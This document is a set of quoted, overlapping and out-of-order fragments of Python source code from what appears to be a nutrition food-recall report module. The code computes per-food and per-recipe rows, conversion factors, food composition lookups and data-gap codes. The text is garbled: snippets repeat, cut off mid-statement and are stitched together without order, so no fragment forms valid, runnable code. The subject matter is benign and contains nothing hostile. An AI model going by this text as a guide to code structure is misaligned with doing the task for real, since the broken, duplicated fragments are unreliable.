"I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated',",
"the user and beneficiary during a recall session. The ingredients of the recipe",
"IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META),",
"row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the",
"This dataset has additional rows inserted for each ingredient. These rows are associated",
"recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient'",
"I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ]",
"row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures)",
"_set_composition(self): # Get the food composition corresponding to food_code, fall back to base_term_food_code",
"as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import",
"IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR),",
"def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v",
"I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking',",
"self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code =",
"_multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name]",
"IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR),",
"component pieces and presents the result as a unified dataset. FoodRow :: Class",
"v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def",
"a gap type is specified, show only rows with gaps of that type",
"I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR,",
"IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'),",
"IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR,",
"== STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total",
"row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE:",
"= {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in",
"if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate':",
"self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code",
"are recipes, and their ingredients appear as separate rows in the report. Standard",
"def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it wasn't",
"I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE),",
"I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units',",
"self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code",
"the result as a unified dataset. FoodRow :: Class responsible for row-wise calculations",
"= _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] =",
"@staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs):",
"I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions',",
"IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR),",
"AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = {",
"diet in a \"recall\" session. This results in a \"foodrecall\" case. Every food",
"self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row",
"self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name):",
"False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False",
"NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE",
"foodrecall. This dataset has a row for every food, with metadata about the",
"don't enumerate the ingredients again. We need to insert duplicates of the previously",
"INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id',",
"= ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if",
"part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows():",
"in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class",
"self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group",
"IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR),",
"the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator",
"self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for age_range",
"IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding',",
"self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if",
"recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid]",
"to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists",
"not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for",
"have their ingredients enumerated in the \"recipes\" lookup table. This dataset has additional",
"FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used]",
"self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and",
"IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER),",
"self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors()",
"= self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code",
"and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code =",
"parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug]",
"return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\")",
"in a \"recall\" session. This results in a \"foodrecall\" case. Every food they",
"self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part",
"CALCULATED_LATER in tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS",
"self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB,",
"IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR,",
"= fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code =",
"I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients',",
"it glues together all the component pieces and presents the result as a",
"docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS",
"the interface to this dataset, it glues together all the component pieces and",
"I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER),",
"about their diet in a \"recall\" session. This results in a \"foodrecall\" case.",
"IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR,",
"import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE,",
"for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc =",
"amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not",
"CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR,",
"recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized",
"in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return",
"_calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams",
"ingredients enumerated in the \"recipes\" lookup table. This dataset has additional rows inserted",
"self.ucr_row[indicator.slug] return None else: # If it's an indicator in the UCR that",
"in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res =",
"IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META),",
"I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking',",
"indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates",
"row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row)",
"I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date',",
"\"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's",
"of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe",
"IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR),",
"= self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and",
"'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: #",
"slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags",
"[], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE):",
"IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE),",
"IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR),",
"= 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY:",
"IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR,",
"self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code'",
"that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else",
"as additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may",
"row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing",
"gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug",
"uuid from collections import defaultdict from functools import reduce from memoized import memoized",
"bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code",
"_get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients =",
"not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated",
"If it's an indicator in the UCR that hasn't been explicitly set, return",
"this dataset, it glues together all the component pieces and presents the result",
"CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const",
"and linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard",
"scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator that",
"custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps,",
"= self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists =",
"recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients)",
"I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'),",
"defaultdict from functools import reduce from memoized import memoized from corehq.apps.es import users",
"recipe are entered as additional food cases and linked to the recipe by",
"I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE),",
"age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name),",
"0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later:",
"raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients",
"recall session, calculated nutritional information, and auditing columns reporting on what data is",
"_matches_in_memory_filters(self, row): # If a gap type is specified, show only rows with",
"nutritional information, and auditing columns reporting on what data is or isn't available.",
"from memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import",
"I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term',",
") @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or",
"the recipe case, but don't have a case of their own. Nonstandard recipes",
"= False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code",
"= 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description",
"IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'),",
"*tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture",
"rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it",
"import reduce from memoized import memoized from corehq.apps.es import users as user_es from",
"base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists =",
"domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if",
"corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData",
"IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER),",
"self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor",
"if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type =",
"'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor",
"filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter",
"ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code =",
"I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META),",
"\"recipes\" lookup table. This dataset has additional rows inserted for each ingredient. These",
"IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR),",
"an indicator in the UCR that hasn't been explicitly set, return that val",
"ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions)",
"recipe more than once, in which case subsequent references point to the recipe",
"and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in",
"not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column)",
"if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this",
"= ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code",
"for each ingredient. These rows are associated with the recipe case, but don't",
"more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self,",
"grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [],",
"can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id',",
"= FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code =",
"user and beneficiary during a recall session. The ingredients of the recipe are",
"def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR",
"into the report for them. Components ---------- FoodData :: This is the interface",
"self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code =",
"[], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']:",
"== 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None):",
"to this dataset, it glues together all the component pieces and presents the",
"= IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can",
"self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used",
"FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in",
"fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in",
"'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if",
"= _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in",
"if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def",
"rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references']",
"IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR,",
"in which case subsequent references point to the recipe definition with already_reported_recipe_case_id and",
"each ingredient. These rows are associated with the recipe case, but don't have",
"FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later'",
"amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type",
"self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code)",
"'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags):",
"uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code",
"self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount)",
"= self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code'",
"i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code]",
"__init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in",
"recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to",
"I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc',",
"if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self,",
"food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups",
